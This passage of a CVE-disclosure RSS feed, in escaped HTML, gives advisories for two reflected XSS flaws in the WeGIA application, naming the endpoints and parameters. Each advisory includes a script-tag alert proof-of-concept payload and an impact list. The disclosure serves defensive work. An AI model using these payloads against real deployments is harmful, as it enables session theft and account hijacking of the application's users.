&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;1&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;1337&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53377/image.png&amp;#34;
	width=&amp;#34;783&amp;#34;
	height=&amp;#34;830&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53377/image_hu_916b39df13121479.png 480w, /p/cve-2025-53377/image_hu_be592415902b7b4b.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;94&amp;#34;
		data-flex-basis=&amp;#34;226px&amp;#34;
	
&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-53377-cross-site-scripting-xss-reflected-endpoint-cadastro_dependente_pessoa_novaphp-parameter-id_funcionario&amp;#34;&amp;gt;CVE-2025-53377: Cross-Site Scripting (XSS) Reflected endpoint &amp;lt;code&amp;gt;cadastro_dependente_pessoa_nova.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;id_funcionario&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53377&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53377&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;cadastro_dependente_pessoa_nova.php&amp;lt;/code&amp;gt; endpoint of the WeGia application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;id_funcionario&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;GET /html/funcionario/cadastro_dependente_pessoa_nova.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;id_funcionario&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;1&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;1337&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53377/image.png&amp;#34;
	width=&amp;#34;783&amp;#34;
	height=&amp;#34;830&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53377/image_hu_916b39df13121479.png 480w, /p/cve-2025-53377/image_hu_be592415902b7b4b.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;94&amp;#34;
		data-flex-basis=&amp;#34;226px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-qgrq-qjq6-h6gj&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-qgrq-qjq6-h6gj&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributor&amp;#34;&amp;gt;Contributor
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 07 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-53525</title>
        <link>https://www.cvehunters.com/p/cve-2025-53525/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-53525/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-53525-cross-site-scripting-xss-reflected-endpoint-profile_familiarphp-parameter-id_dependente&amp;#34;&amp;gt;CVE-2025-53525: Cross-Site Scripting (XSS) Reflected endpoint &amp;lt;code&amp;gt;profile_familiar.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;id_dependente&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53525&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53525&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;profile_familiar.php&amp;lt;/code&amp;gt; endpoint of the WeGia application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;id_dependente&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;GET /html/atendido/profile_familiar.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;id_dependente&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;1&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53525/image.png&amp;#34;
	width=&amp;#34;719&amp;#34;
	height=&amp;#34;387&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53525/image_hu_3838ecfb5877b657.png 480w, /p/cve-2025-53525/image_hu_2be71b163f884c00.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;185&amp;#34;
		data-flex-basis=&amp;#34;445px&amp;#34;
	
&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53525/image-1.png&amp;#34;
	width=&amp;#34;1071&amp;#34;
	height=&amp;#34;559&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53525/image-1_hu_5da17087cd8d939f.png 480w, /p/cve-2025-53525/image-1_hu_8abfd2784d7d0262.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;191&amp;#34;
		data-flex-basis=&amp;#34;459px&amp;#34;
	
&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-53525-cross-site-scripting-xss-reflected-endpoint-profile_familiarphp-parameter-id_dependente&amp;#34;&amp;gt;CVE-2025-53525: Cross-Site Scripting (XSS) Reflected endpoint &amp;lt;code&amp;gt;profile_familiar.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;id_dependente&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53525&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53525&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;profile_familiar.php&amp;lt;/code&amp;gt; endpoint of the WeGia application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;id_dependente&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;GET /html/atendido/profile_familiar.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;id_dependente&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;1&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53525/image.png&amp;#34;
	width=&amp;#34;719&amp;#34;
	height=&amp;#34;387&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53525/image_hu_3838ecfb5877b657.png 480w, /p/cve-2025-53525/image_hu_2be71b163f884c00.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;185&amp;#34;
		data-flex-basis=&amp;#34;445px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53525/image-1.png&amp;#34;
	width=&amp;#34;1071&amp;#34;
	height=&amp;#34;559&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53525/image-1_hu_5da17087cd8d939f.png 480w, /p/cve-2025-53525/image-1_hu_8abfd2784d7d0262.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;191&amp;#34;
		data-flex-basis=&amp;#34;459px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-982x-v58q-6qpj&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-982x-v58q-6qpj&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
